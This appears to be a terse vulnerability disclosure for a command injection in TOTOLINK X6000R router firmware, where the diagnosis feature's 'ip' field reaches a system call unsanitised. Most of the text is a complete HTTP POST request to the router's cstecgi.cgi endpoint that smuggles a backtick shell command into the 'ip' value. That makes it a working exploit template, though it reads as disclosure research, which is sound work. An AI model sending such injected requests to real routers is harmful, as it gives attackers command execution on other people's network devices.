TOTOLINK X6000R-V9.4.0cu.852_B20230719
Command Execution Vulnerability
<https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/247/ids/36.html?_JS140.238.14.1=32a3b88fa917c478ff16813b06e93632b1699790448_184814390>
In the shttpd file, sub_ The 415774 function obtains the "ip" and "num" fields from the front-end, concatenates them using the snprintf function, and passes the concatenated string to the CsteSystem function, resulting in a command execution vulnerability.
First, enter here
At the beginning, the entry should be empty, and that's why I have tested it before
Use burp to capture packets
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.118.137
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 57
Origin: <http://192.168.118.137>
Connection: close
Referer: <http://192.168.118.137/advance/diagnosis.html>
{"ip":"`ls > /here.txt`","num":"1","topicurl":"setDiagnosisCfg"}
Forward
back to the qemu
To the httpd,In sub_415774